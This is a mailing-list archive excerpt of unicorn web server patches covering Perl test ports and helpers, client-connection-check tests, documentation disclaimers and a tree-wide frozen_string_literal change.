diff --git a/t/integration.ru b/t/integration.ru
index a6b022a..aaed608 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -87,6 +87,7 @@ def rack_input_tests(env)
   [ 200, h, [ dig.hexdigest ] ]
 end
 
+$nr_aborts = 0
 run(lambda do |env|
   case env['REQUEST_METHOD']
   when 'GET'
@@ -101,7 +102,10 @@ def rack_input_tests(env)
     when '/early_hints_rack2'; early_hints(env, "r\n2")
     when '/early_hints_rack3'; early_hints(env, %w(r 3))
     when '/broken_app'; raise RuntimeError, 'hello'
+    when '/aborted'; $nr_aborts += 1; [ 200, {}, [] ]
+    when '/nr_aborts'; [ 200, { 'nr-aborts' => "#$nr_aborts" }, [] ]
     when '/nil'; nil
+    when '/read_fifo'; [ 200, {}, [ File.read(env['HTTP_READ_FIFO']) ] ]
     else '/'; [ 200, {}, [ env_dump(env) ] ]
     end # case PATH_INFO (GET)
   when 'POST'
diff --git a/t/integration.t b/t/integration.t
index 3b1d6df..2d448cd 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -405,6 +405,39 @@ EOM
 	my $wpid = readline($fifo_fh);
 	like($wpid, qr/\Apid=\d+\z/a , 'new worker ready');
 	$ck_early_hints->('ccc on');
+
+	$c = tcp_start $srv, 'GET /env_dump HTTP/1.0';
+	vec(my $rvec = '', fileno($c), 1) = 1;
+	select($rvec, undef, undef, 10) or BAIL_OUT 'timed out env_dump';
+	($status, $hdr) = slurp_hdr($c);
+	like $status, qr!\AHTTP/1\.[01] 200!, 'got part of first response';
+	ok $hdr, 'got all headers';
+
+	# start a slow TCP request
+	my $rfifo = "$tmpdir/rfifo";
+	mkfifo_die $rfifo;
+	$c = tcp_start $srv, "GET /read_fifo HTTP/1.0\r\nRead-FIFO: $rfifo";
+	tcp_start $srv, 'GET /aborted HTTP/1.0' for (1..100);
+	write_file '>', $rfifo, 'TFIN';
+	($status, $hdr) = slurp_hdr($c);
+	like $status, qr!\AHTTP/1\.[01] 200!, 'got part of first response';
+	$bdy = <$c>;
+	is $bdy, 'TFIN', 'got slow response from TCP socket';
+
+	# slow Unix socket request
+	$c = unix_start $u1, "GET /read_fifo HTTP/1.0\r\nRead-FIFO: $rfifo";
+	vec($rvec = '', fileno($c), 1) = 1;
+	select($rvec, undef, undef, 10) or BAIL_OUT 'timed out Unix CCC';
+	unix_start $u1, 'GET /aborted HTTP/1.0' for (1..100);
+	write_file '>', $rfifo, 'UFIN';
+	($status, $hdr) = slurp_hdr($c);
+	like $status, qr!\AHTTP/1\.[01] 200!, 'got part of first response';
+	$bdy = <$c>;
+	is $bdy, 'UFIN', 'got slow response from Unix socket';
+
+	($status, $hdr, $bdy) = do_req $srv, 'GET /nr_aborts HTTP/1.0';
+	like "@$hdr", qr/nr-aborts: 0\b/,
+		'aborted connections unseen by Rack app';
 }
 
 if ('max_header_len internal API') {
diff --git a/test/unit/test_ccc.rb b/test/unit/test_ccc.rb
deleted file mode 100644
index a0a2bff..0000000
--- a/test/unit/test_ccc.rb
+++ /dev/null
@@ -1,92 +0,0 @@
-# frozen_string_literal: false
-require 'socket'
-require 'unicorn'
-require 'io/wait'
-require 'tempfile'
-require 'test/unit'
-require './test/test_helper'
-
-class TestCccTCPI < Test::Unit::TestCase
-  def test_ccc_tcpi
-    start_pid = $$
-    host = '127.0.0.1'
-    srv = TCPServer.new(host, 0)
-    port = srv.addr[1]
-    err = Tempfile.new('unicorn_ccc')
-    rd, wr = IO.pipe
-    sleep_pipe = IO.pipe
-    pid = fork do
-      sleep_pipe[1].close
-      reqs = 0
-      rd.close
-      worker_pid = nil
-      app = lambda do |env|
-        worker_pid ||= begin
-          at_exit { wr.write(reqs.to_s) if worker_pid == $$ }
-          $$
-        end
-        reqs += 1
-
-        # will wake up when writer closes
-        sleep_pipe[0].read if env['PATH_INFO'] == '/sleep'
-
-        [ 200, {'content-length'=>'0', 'content-type'=>'text/plain'}, [] ]
-      end
-      ENV['UNICORN_FD'] = srv.fileno.to_s
-      opts = {
-        listeners: [ "#{host}:#{port}" ],
-        stderr_path: err.path,
-        check_client_connection: true,
-      }
-      uni = Unicorn::HttpServer.new(app, opts)
-      uni.start.join
-    end
-    wr.close
-
-    # make sure the server is running, at least
-    client = tcp_socket(host, port)
-    client.write("GET / HTTP/1.1\r\nHost: example.com\r\n\r\n")
-    assert client.wait(10), 'never got response from server'
-    res = client.read
-    assert_match %r{\AHTTP/1\.1 200}, res, 'got part of first response'
-    assert_match %r{\r\n\r\n\z}, res, 'got end of response, server is ready'
-    client.close
-
-    # start a slow request...
-    sleeper = tcp_socket(host, port)
-    sleeper.write("GET /sleep HTTP/1.1\r\nHost: example.com\r\n\r\n")
-
-    # and a bunch of aborted ones
-    nr = 100
-    nr.times do |i|
-      client = tcp_socket(host, port)
-      client.write("GET /collections/#{rand(10000)} HTTP/1.1\r\n" \
-                   "Host: example.com\r\n\r\n")
-      client.close
-    end
-    sleep_pipe[1].close # wake up the reader in the worker
-    res = sleeper.read
-    assert_match %r{\AHTTP/1\.1 200}, res, 'got part of first sleeper response'
-    assert_match %r{\r\n\r\n\z}, res, 'got end of sleeper response'
-    sleeper.close
-    kpid = pid
-    pid = nil
-    Process.kill(:QUIT, kpid)
-    _, status = Process.waitpid2(kpid)
-    assert status.success?
-    reqs = rd.read.to_i
-    warn "server got #{reqs} requests with #{nr} CCC aborted\n" if $DEBUG
-    assert_operator reqs, :<, nr
-    assert_operator reqs, :>=, 2, 'first 2 requests got through, at least'
-  ensure
-    return if start_pid != $$
-    srv.close if srv
-    if pid
-      Process.kill(:QUIT, pid)
-      _, status = Process.waitpid2(pid)
-      assert status.success?
-    end
-    err.close! if err
-    rd.close if rd
-  end
-end

^ permalink raw reply related	[relevance 1%]

* [PATCH 0/4] a small pile of patches
@ 2024-03-23 19:45  4% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2024-03-23 19:45 UTC (permalink / raw)
  To: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 4446 bytes --]

Some stuff to future-proof against future Ruby incompatibilities.
More coming....

I've also pushed out preliminary work (started in 2021) to the
`pico' branch to switch the HTTP parser from Ragel to
picohttpparser.  It will simplify the build + maintenance,
especially when distros carry different Ragel versions (or don't
package it all, as some hackers can't afford bandwidth and disk
for a C++ toolchain).

Other notes: New releases will probably be hosted on yhbt.net if
the Rubygems.org MFA threshold is reached.  Caring about the
identity of hackers is totally misguided when we already show
our code (and even document it!).  If you can't audit the code
yourself, get an actual professional to do it and don't bother
amateurs like me.

Eric Wong (4):
  t/integration: disable proxies when running curl(1)
  tests: port back-out-of-upgrade to Perl 5
  doc: various updates and disclaimers
  treewide: future-proof frozen_string_literal changes

 HACKING                             |  13 +++-
 README                              |   9 +++
 Rakefile                            |   1 +
 TODO                                |   4 +-
 bin/unicorn                         |   1 +
 bin/unicorn_rails                   |   1 +
 examples/big_app_gc.rb              |   1 +
 examples/echo.ru                    |   1 +
 examples/logger_mp_safe.rb          |   1 +
 examples/unicorn.conf.minimal.rb    |   1 +
 examples/unicorn.conf.rb            |   1 +
 ext/unicorn_http/extconf.rb         |   1 +
 lib/unicorn.rb                      |   1 +
 lib/unicorn/app/old_rails.rb        |   1 +
 lib/unicorn/app/old_rails/static.rb |   1 +
 lib/unicorn/cgi_wrapper.rb          |   1 +
 lib/unicorn/configurator.rb         |   1 +
 lib/unicorn/const.rb                |   1 +
 lib/unicorn/http_request.rb         |   1 +
 lib/unicorn/http_response.rb        |   1 +
 lib/unicorn/http_server.rb          |   1 +
 lib/unicorn/launcher.rb             |   1 +
 lib/unicorn/oob_gc.rb               |   1 +
 lib/unicorn/preread_input.rb        |   1 +
 lib/unicorn/select_waiter.rb        |   1 +
 lib/unicorn/socket_helper.rb        |   1 +
 lib/unicorn/stream_input.rb         |   1 +
 lib/unicorn/tee_input.rb            |   1 +
 lib/unicorn/tmpio.rb                |   1 +
 lib/unicorn/util.rb                 |   1 +
 lib/unicorn/worker.rb               |   1 +
 setup.rb                            |   1 +
 t/back-out-of-upgrade.t             |  44 +++++++++++
 t/broken-app.ru                     |   1 +
 t/client_body_buffer_size.ru        |   1 +
 t/detach.ru                         |   1 +
 t/env.ru                            |   1 +
 t/fails-rack-lint.ru                |   1 +
 t/heartbeat-timeout.ru              |   1 +
 t/integration.ru                    |   1 +
 t/integration.t                     |   1 +
 t/lib.perl                          |  67 ++++++++++++++---
 t/listener_names.ru                 |   1 +
 t/oob_gc.ru                         |   1 +
 t/oob_gc_path.ru                    |   1 +
 t/pid.ru                            |   1 +
 t/preread_input.ru                  |   1 +
 t/reopen-logs.ru                    |   1 +
 t/t0008-back_out_of_upgrade.sh      | 110 ----------------------------
 t/t0013.ru                          |   1 +
 t/t0014.ru                          |   1 +
 t/t0301.ru                          |   1 +
 test/aggregate.rb                   |   1 +
 test/benchmark/dd.ru                |   1 +
 test/benchmark/ddstream.ru          |   1 +
 test/benchmark/readinput.ru         |   1 +
 test/benchmark/stack.ru             |   1 +
 test/exec/test_exec.rb              |   1 +
 test/test_helper.rb                 |   1 +
 test/unit/test_ccc.rb               |   1 +
 test/unit/test_configurator.rb      |   1 +
 test/unit/test_droplet.rb           |   1 +
 test/unit/test_http_parser.rb       |   1 +
 test/unit/test_http_parser_ng.rb    |   1 +
 test/unit/test_request.rb           |   1 +
 test/unit/test_server.rb            |   1 +
 test/unit/test_signals.rb           |   1 +
 test/unit/test_socket_helper.rb     |   1 +
 test/unit/test_stream_input.rb      |   1 +
 test/unit/test_tee_input.rb         |   1 +
 test/unit/test_util.rb              |   1 +
 test/unit/test_waiter.rb            |   1 +
 unicorn.gemspec                     |   1 +
 73 files changed, 188 insertions(+), 126 deletions(-)
 create mode 100644 t/back-out-of-upgrade.t
 delete mode 100755 t/t0008-back_out_of_upgrade.sh

[-- Attachment #2: 0001-t-integration-disable-proxies-when-running-curl-1.patch --]
[-- Type: text/x-diff, Size: 737 bytes --]

From f3acce5dce62ac4b0288d3c0ddf0a6db2cbd9e7f Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Tue, 9 Jan 2024 21:35:08 +0000
Subject: [PATCH 1/4] t/integration: disable proxies when running curl(1)

This was also done in t/test-lib.sh, but using '*' is more
encompassing.
---
 t/integration.t | 1 +
 1 file changed, 1 insertion(+)

diff --git a/t/integration.t b/t/integration.t
index 7310ff2..d17ace0 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -27,6 +27,7 @@ listen "$u1"
 EOM
 my $ar = unicorn(qw(-E none t/integration.ru -c), $u_conf, { 3 => $srv });
 my $curl = which('curl');
+local $ENV{NO_PROXY} = '*'; # for curl
 my $fifo = "$tmpdir/fifo";
 POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
 my %PUT = (

[-- Attachment #3: 0002-tests-port-back-out-of-upgrade-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 8889 bytes --]

From 724fb631c76f09964ec289ee8e144886ba15d380 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 6 Nov 2023 05:45:29 +0000
Subject: [PATCH 2/4] tests: port back-out-of-upgrade to Perl 5

Another place where we can be faster without adding more
dependencies on Ruby maintaining stable behavior.
---
 t/back-out-of-upgrade.t        |  44 +++++++++++++
 t/lib.perl                     |  67 +++++++++++++++++---
 t/t0008-back_out_of_upgrade.sh | 110 ---------------------------------
 3 files changed, 102 insertions(+), 119 deletions(-)
 create mode 100644 t/back-out-of-upgrade.t
 delete mode 100755 t/t0008-back_out_of_upgrade.sh

diff --git a/t/back-out-of-upgrade.t b/t/back-out-of-upgrade.t
new file mode 100644
index 0000000..cf3b09f
--- /dev/null
+++ b/t/back-out-of-upgrade.t
@@ -0,0 +1,44 @@
+#!perl -w
+# Copyright (C) unicorn hackers <unicorn-public@yhbt.net>
+# License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+# test backing out of USR2 upgrade
+use v5.14; BEGIN { require './t/lib.perl' };
+use autodie;
+my $srv = tcp_server();
+mkfifo_die $fifo;
+write_file '>', $u_conf, <<EOM;
+preload_app true
+stderr_path "$err_log"
+pid "$pid_file"
+after_fork { |s,w| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
+EOM
+my $ar = unicorn(qw(-E none t/pid.ru -c), $u_conf, { 3 => $srv });
+
+like(my $wpid_orig_1 = slurp($fifo), qr/\Apid=\d+\z/a, 'got worker pid');
+
+ok $ar->do_kill('USR2'), 'USR2 to start upgrade';
+ok $ar->do_kill('WINCH'), 'drop old worker';
+
+like(my $wpid_new = slurp($fifo), qr/\Apid=\d+\z/a, 'got pid from new master');
+chomp(my $new_pid = slurp($pid_file));
+isnt $new_pid, $ar->{pid}, 'PID file changed';
+chomp(my $pid_oldbin = slurp("$pid_file.oldbin"));
+is $pid_oldbin, $ar->{pid}, '.oldbin PID valid';
+
+ok $ar->do_kill('HUP'), 'HUP old master';
+like(my $wpid_orig_2 = slurp($fifo), qr/\Apid=\d+\z/a, 'got worker new pid');
+ok kill('QUIT', $new_pid), 'abort old master';
+kill_until_dead $new_pid;
+
+my ($st, $hdr, $req_pid) = do_req $srv, 'GET /';
+chomp $req_pid;
+is $wpid_orig_2, "pid=$req_pid", 'new worker on old worker serves';
+
+ok !-f "$pid_file.oldbin", '.oldbin PID file gone';
+chomp(my $old_pid = slurp($pid_file));
+is $old_pid, $ar->{pid}, 'PID file restored';
+
+my @log = grep !/ERROR -- : reaped .*? exec\(\)-ed/, slurp($err_log);
+check_stderr @log;
+undef $tmpdir;
+done_testing;
diff --git a/t/lib.perl b/t/lib.perl
index 9254b23..b20a2c6 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -6,30 +6,58 @@ use v5.14;
 use parent qw(Exporter);
 use autodie;
 use Test::More;
+use Socket qw(SOMAXCONN);
 use Time::HiRes qw(sleep time);
 use IO::Socket::INET;
+use IO::Socket::UNIX;
+use Carp qw(croak);
 use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh, $err_log, $u_sock, $u_conf, $daemon_pid,
-	$pid_file);
+	$pid_file, $wtest_sock, $fifo);
 our @EXPORT = qw(unicorn slurp tcp_server tcp_start unicorn
 	$tmpdir $errfh $err_log $u_sock $u_conf $daemon_pid $pid_file
+	$wtest_sock $fifo
 	SEEK_SET tcp_host_port which spawn check_stderr unix_start slurp_hdr
-	do_req stop_daemon sleep time);
+	do_req stop_daemon sleep time mkfifo_die kill_until_dead write_file);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
+
+$wtest_sock = "$tmpdir/wtest.sock";
 $err_log = "$tmpdir/err.log";
 $pid_file = "$tmpdir/pid";
+$fifo = "$tmpdir/fifo";
 $u_sock = "$tmpdir/u.sock";
 $u_conf = "$tmpdir/u.conf.rb";
 open($errfh, '>>', $err_log);
 
+if (my $t = $ENV{TAIL}) {
+	my @tail = $t =~ /tail/ ? split(/\s+/, $t) : (qw(tail -F));
+	push @tail, $err_log;
+	my $pid = fork;
+	if ($pid == 0) {
+		open STDOUT, '>&', \*STDERR;
+		exec @tail;
+		die "exec(@tail): $!";
+	}
+	say "# @tail";
+	sleep 0.2;
+	UnicornTest::AutoReap->new($pid);
+}
+
+sub kill_until_dead ($;%) {
+	my ($pid, %opt) = @_;
+	my $tries = $opt{tries} // 1000;
+	my $sig = $opt{sig} // 0;
+	while (CORE::kill($sig, $pid) && --$tries) { sleep(0.01) }
+	$tries or croak "PID: $pid died after signal ($sig)";
+}
+
 sub stop_daemon (;$) {
 	my ($is_END) = @_;
 	kill('TERM', $daemon_pid);
-	my $tries = 1000;
-	while (CORE::kill(0, $daemon_pid) && --$tries) { sleep(0.01) }
+	kill_until_dead $daemon_pid;
 	if ($is_END && CORE::kill(0, $daemon_pid)) { # after done_testing
 		CORE::kill('KILL', $daemon_pid);
 		die "daemon_pid=$daemon_pid did not die";
@@ -44,8 +72,9 @@ END {
 	stop_daemon(1) if defined $daemon_pid;
 };
 
-sub check_stderr () {
-	my @log = slurp($err_log);
+sub check_stderr (@) {
+	my @log = @_;
+	slurp($err_log) if !@log;
 	diag("@log") if $ENV{V};
 	my @err = grep(!/NameError.*Unicorn::Waiter/, grep(/error/i, @log));
 	@err = grep(!/failed to set accept_filter=/, @err);
@@ -63,6 +92,16 @@ sub slurp_hdr {
 	($status, \@hdr);
 }
 
+sub unix_server (;$@) {
+	my $l = shift // $u_sock;
+	IO::Socket::UNIX->new(Listen => SOMAXCONN, Local => $l, Blocking => 0,
+				Type => SOCK_STREAM, @_);
+}
+
+sub unix_connect ($) {
+	IO::Socket::UNIX->new(Peer => $_[0], Type => SOCK_STREAM);
+}
+
 sub tcp_server {
 	my %opt = (
 		ReuseAddr => 1,
@@ -95,8 +134,7 @@ sub tcp_host_port {
 
 sub unix_start ($@) {
 	my ($dst, @req) = @_;
-	my $s = IO::Socket::UNIX->new(Peer => $dst, Type => SOCK_STREAM) or
-		BAIL_OUT "unix connect $dst: $!";
+	my $s = unix_connect($dst) or BAIL_OUT "unix connect $dst: $!";
 	$s->autoflush(1);
 	print $s @req, "\r\n\r\n" if @req;
 	$s;
@@ -201,7 +239,7 @@ sub unicorn {
 	state $ver = $ENV{TEST_RUBY_VERSION} // `$ruby -e 'print RUBY_VERSION'`;
 	state $eng = $ENV{TEST_RUBY_ENGINE} // `$ruby -e 'print RUBY_ENGINE'`;
 	state $ext = File::Spec->rel2abs("test/$eng-$ver/ext/unicorn_http");
-	state $exe = File::Spec->rel2abs('bin/unicorn');
+	state $exe = File::Spec->rel2abs("test/$eng-$ver/bin/unicorn");
 	my $pid = spawn(\%env, $ruby, '-I', $lib, '-I', $ext, $exe, @args);
 	UnicornTest::AutoReap->new($pid);
 }
@@ -219,6 +257,17 @@ sub do_req ($@) {
 	($status, $hdr, $bdy);
 }
 
+sub mkfifo_die ($;$) {
+	POSIX::mkfifo($_[0], $_[1] // 0600) or croak "mkfifo: $!";
+}
+
+sub write_file ($$@) { # mode, filename, LIST (for print)
+	open(my $fh, shift, shift);
+	print $fh @_;
+	# return $fh for futher writes if user wants it:
+	defined(wantarray) && !wantarray ? $fh : close $fh;
+}
+
 # automatically kill + reap children when this goes out-of-scope
 package UnicornTest::AutoReap;
 use v5.14;
diff --git a/t/t0008-back_out_of_upgrade.sh b/t/t0008-back_out_of_upgrade.sh
deleted file mode 100755
index 96d4057..0000000
--- a/t/t0008-back_out_of_upgrade.sh
+++ /dev/null
@@ -1,110 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 13 "backout of USR2 upgrade"
-
-worker_wait_start () {
-	test xSTART = x"$(cat $fifo)"
-	unicorn_pid=$(cat $pid)
-}
-
-t_begin "setup and start" && {
-	unicorn_setup
-	rm -f $pid.oldbin
-
-cat >> $unicorn_config <<EOF
-after_fork do |server, worker|
-  # test script will block while reading from $fifo,
-  # so notify the script on the first worker we spawn
-  # by opening the FIFO
-  if worker.nr == 0
-    File.open("$fifo", "wb") { |fp| fp.syswrite "START" }
-  end
-end
-EOF
-	unicorn -D -c $unicorn_config pid.ru
-	worker_wait_start
-	orig_master_pid=$unicorn_pid
-}
-
-t_begin "read original worker pid" && {
-	orig_worker_pid=$(curl -sSf http://$listen/)
-	test -n "$orig_worker_pid" && kill -0 $orig_worker_pid
-}
-
-t_begin "upgrade to new master" && {
-	kill -USR2 $orig_master_pid
-}
-
-t_begin "kill old worker" && {
-	kill -WINCH $orig_master_pid
-}
-
-t_begin "wait for new worker to start" && {
-	worker_wait_start
-	test $unicorn_pid -ne $orig_master_pid
-	new_master_pid=$unicorn_pid
-}
-
-t_begin "old master pid is stashed in $pid.oldbin" && {
-	test -s "$pid.oldbin"
-	test $orig_master_pid -eq $(cat $pid.oldbin)
-}
-
-t_begin "ensure old worker is no longer running" && {
-	i=0
-	while kill -0 $orig_worker_pid 2>/dev/null
-	do
-		i=$(( $i + 1 ))
-		test $i -lt 600 || die "timed out"
-		sleep 1
-	done
-}
-
-t_begin "capture pid of new worker" && {
-	new_worker_pid=$(curl -sSf http://$listen/)
-}
-
-t_begin "reload old master process" && {
-	kill -HUP $orig_master_pid
-	worker_wait_start
-}
-
-t_begin "gracefully kill new master and ensure it dies" && {
-	kill -QUIT $new_master_pid
-	i=0
-	while kill -0 $new_worker_pid 2>/dev/null
-	do
-		i=$(( $i + 1 ))
-		test $i -lt 600 || die "timed out"
-		sleep 1
-	done
-}
-
-t_begin "ensure $pid.oldbin does not exist" && {
-	i=0
-	while test -s $pid.oldbin
-	do
-		i=$(( $i + 1 ))
-		test $i -lt 600 || die "timed out"
-		sleep 1
-	done
-	while ! test -s $pid
-	do
-		i=$(( $i + 1 ))
-		test $i -lt 600 || die "timed out"
-		sleep 1
-	done
-}
-
-t_begin "ensure $pid is correct" && {
-	cur_master_pid=$(cat $pid)
-	test $orig_master_pid -eq $cur_master_pid
-}
-
-t_begin "killing succeeds" && {
-	kill $orig_master_pid
-}
-
-dbgcat r_err
-
-t_done

[-- Attachment #4: 0003-doc-various-updates-and-disclaimers.patch --]
[-- Type: text/x-diff, Size: 3343 bytes --]

From 69d15a7a51a096b6acf00ccf23e1b988076d3b5f Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Mon, 1 Jan 2024 10:43:13 +0000
Subject: [PATCH 3/4] doc: various updates and disclaimers

Covering my ass from draconian legislation.
---
 HACKING | 13 +++++++++----
 README  |  9 +++++++++
 TODO    |  4 +---
 3 files changed, 19 insertions(+), 7 deletions(-)

diff --git a/HACKING b/HACKING
index 5aca83e..777e75e 100644
--- a/HACKING
+++ b/HACKING
@@ -6,6 +6,8 @@ Like Mongrel, we use Ruby where it makes sense, and Ragel with C where
 it helps performance.  All of the code that actually runs your Rack
 application is written Ruby, Ragel or C.
 
+Ragel may be dropped in favor of a picohttpparser-based one in the future.
+
 As far as tests and documentation goes, we're not afraid to embrace Unix
 and use traditional Unix tools where they make sense and get the job
 done.
@@ -16,6 +18,9 @@ Tests are good, but slow tests make development slow, so we make tests
 faster (in parallel) with GNU make (instead of Rake) and avoiding
 RubyGems.
 
+New tests are written in Perl 5 and use TAP <https://testanything.org/>
+to ensure stability and immunity from Ruby incompatibilities.
+
 Users of GNU-based systems (such as GNU/Linux) usually have GNU make
 installed as "make" instead of "gmake".
 
@@ -69,10 +74,10 @@ supported by the versions of Ruby we target.
 
 === Ragel Compatibility
 
-We target the latest released version of Ragel and will update our code
-to keep up with new releases.  Packaged tarballs and gems include the
-generated source code so they will remain usable if compatibility is
-broken.
+We target the latest released version of Ragel in Debian and will update
+our code to keep up with new releases.  Packaged tarballs and gems
+include the generated source code so they will remain usable if
+compatibility is broken.
 
 == Contributing
 
diff --git a/README b/README
index 84c0fdf..b60ed00 100644
--- a/README
+++ b/README
@@ -122,6 +122,7 @@ supported.  Run `unicorn -h` to see command-line options.
 
 There is NO WARRANTY whatsoever if anything goes wrong, but
 {let us know}[link:ISSUES.html] and maybe someone can fix it.
+No commercial support will ever be provided by the amateur maintainer.
 
 unicorn is designed to only serve fast clients either on the local host
 or a fast LAN.  See the PHILOSOPHY and DESIGN documents for more details
@@ -132,6 +133,14 @@ damage done to the entire Ruby ecosystem.  Its unintentional popularity
 set Ruby back decades in parallelism, concurrency and robustness since
 it prolongs and proliferates the existence of poorly-written code.
 
+unicorn hackers are NOT responsible for your supply chain security:
+read and understand it yourself or get someone you trust to audit it.
+Malicious commits and releases will be made if under duress.  The only
+defense you'll ever have is from reviewing the source code.
+
+No user or contributor will ever be expected to sacrifice their own
+security by running JavaScript or revealing any personal information.
+
 == Contact
 
 All feedback (bug reports, user/development dicussion, patches, pull
diff --git a/TODO b/TODO
index ebbccdc..a3b18fd 100644
--- a/TODO
+++ b/TODO
@@ -1,3 +1 @@
-* Documentation improvements
-
-* improve test suite
+* improve test suite (port to Perl 5 for stability and maintainability)

[-- Attachment #5: 0004-treewide-future-proof-frozen_string_literal-changes.patch --]
[-- Type: text/x-diff, Size: 24100 bytes --]

From ccf2443901c18ffb26b2785f52d921005e862167 Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Thu, 8 Feb 2024 12:16:31 +0000
Subject: [PATCH 4/4] treewide: future-proof frozen_string_literal changes

Once again Ruby seems ready to introduce more incompatibilities
and force busywork upon maintainers[1].  In order to avoid
incompatibilities in the future, I used a Perl script[2] to
prepend `frozen_string_literal: false' to every Ruby file.

Somebody interested will have to go through every Ruby source
file and enable frozen_string_literal once they've thoroughly
verified it's safe to do so.

[1] https://bugs.ruby-lang.org/issues/20205
[2] https://yhbt.net/add-fsl.git/74d7689/s/?b=add-fsl.perl
---
 Rakefile                            | 1 +
 bin/unicorn                         | 1 +
 bin/unicorn_rails                   | 1 +
 examples/big_app_gc.rb              | 1 +
 examples/echo.ru                    | 1 +
 examples/logger_mp_safe.rb          | 1 +
 examples/unicorn.conf.minimal.rb    | 1 +
 examples/unicorn.conf.rb            | 1 +
 ext/unicorn_http/extconf.rb         | 1 +
 lib/unicorn.rb                      | 1 +
 lib/unicorn/app/old_rails.rb        | 1 +
 lib/unicorn/app/old_rails/static.rb | 1 +
 lib/unicorn/cgi_wrapper.rb          | 1 +
 lib/unicorn/configurator.rb         | 1 +
 lib/unicorn/const.rb                | 1 +
 lib/unicorn/http_request.rb         | 1 +
 lib/unicorn/http_response.rb        | 1 +
 lib/unicorn/http_server.rb          | 1 +
 lib/unicorn/launcher.rb             | 1 +
 lib/unicorn/oob_gc.rb               | 1 +
 lib/unicorn/preread_input.rb        | 1 +
 lib/unicorn/select_waiter.rb        | 1 +
 lib/unicorn/socket_helper.rb        | 1 +
 lib/unicorn/stream_input.rb         | 1 +
 lib/unicorn/tee_input.rb            | 1 +
 lib/unicorn/tmpio.rb                | 1 +
 lib/unicorn/util.rb                 | 1 +
 lib/unicorn/worker.rb               | 1 +
 setup.rb                            | 1 +
 t/broken-app.ru                     | 1 +
 t/client_body_buffer_size.ru        | 1 +
 t/detach.ru                         | 1 +
 t/env.ru                            | 1 +
 t/fails-rack-lint.ru                | 1 +
 t/heartbeat-timeout.ru              | 1 +
 t/integration.ru                    | 1 +
 t/listener_names.ru                 | 1 +
 t/oob_gc.ru                         | 1 +
 t/oob_gc_path.ru                    | 1 +
 t/pid.ru                            | 1 +
 t/preread_input.ru                  | 1 +
 t/reopen-logs.ru                    | 1 +
 t/t0013.ru                          | 1 +
 t/t0014.ru                          | 1 +
 t/t0301.ru                          | 1 +
 test/aggregate.rb                   | 1 +
 test/benchmark/dd.ru                | 1 +
 test/benchmark/ddstream.ru          | 1 +
 test/benchmark/readinput.ru         | 1 +
 test/benchmark/stack.ru             | 1 +
 test/exec/test_exec.rb              | 1 +
 test/test_helper.rb                 | 1 +
 test/unit/test_ccc.rb               | 1 +
 test/unit/test_configurator.rb      | 1 +
 test/unit/test_droplet.rb           | 1 +
 test/unit/test_http_parser.rb       | 1 +
 test/unit/test_http_parser_ng.rb    | 1 +
 test/unit/test_request.rb           | 1 +
 test/unit/test_server.rb            | 1 +
 test/unit/test_signals.rb           | 1 +
 test/unit/test_socket_helper.rb     | 1 +
 test/unit/test_stream_input.rb      | 1 +
 test/unit/test_tee_input.rb         | 1 +
 test/unit/test_util.rb              | 1 +
 test/unit/test_waiter.rb            | 1 +
 unicorn.gemspec                     | 1 +
 66 files changed, 66 insertions(+)

diff --git a/Rakefile b/Rakefile
index 37569ce..fe1588b 100644
--- a/Rakefile
+++ b/Rakefile
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # optional rake-compiler support in case somebody needs to cross compile
 begin
   mk = "ext/unicorn_http/Makefile"
diff --git a/bin/unicorn b/bin/unicorn
index 00c8464..af8353c 100755
--- a/bin/unicorn
+++ b/bin/unicorn
@@ -1,5 +1,6 @@
 #!/this/will/be/overwritten/or/wrapped/anyways/do/not/worry/ruby
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 require 'unicorn/launcher'
 require 'optparse'
 
diff --git a/bin/unicorn_rails b/bin/unicorn_rails
index 354c1df..374fd8e 100755
--- a/bin/unicorn_rails
+++ b/bin/unicorn_rails
@@ -1,5 +1,6 @@
 #!/this/will/be/overwritten/or/wrapped/anyways/do/not/worry/ruby
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 require 'unicorn/launcher'
 require 'optparse'
 require 'fileutils'
diff --git a/examples/big_app_gc.rb b/examples/big_app_gc.rb
index c1bae10..0baea26 100644
--- a/examples/big_app_gc.rb
+++ b/examples/big_app_gc.rb
@@ -1,2 +1,3 @@
+# frozen_string_literal: false
 # see {Unicorn::OobGC}[https://yhbt.net/unicorn/Unicorn/OobGC.html]
 # Unicorn::OobGC was broken in Unicorn v3.3.1 - v3.6.1 and fixed in v3.6.2
diff --git a/examples/echo.ru b/examples/echo.ru
index e982180..453a5e6 100644
--- a/examples/echo.ru
+++ b/examples/echo.ru
@@ -1,4 +1,5 @@
 #\-E none
+# frozen_string_literal: false
 #
 # Example application that echoes read data back to the HTTP client.
 # This emulates the old echo protocol people used to run.
diff --git a/examples/logger_mp_safe.rb b/examples/logger_mp_safe.rb
index 05ad3fa..f2c0500 100644
--- a/examples/logger_mp_safe.rb
+++ b/examples/logger_mp_safe.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # Multi-Processing-safe monkey patch for Logger
 #
 # This monkey patch fixes the case where "preload_app true" is used and
diff --git a/examples/unicorn.conf.minimal.rb b/examples/unicorn.conf.minimal.rb
index 46fd634..4f96ede 100644
--- a/examples/unicorn.conf.minimal.rb
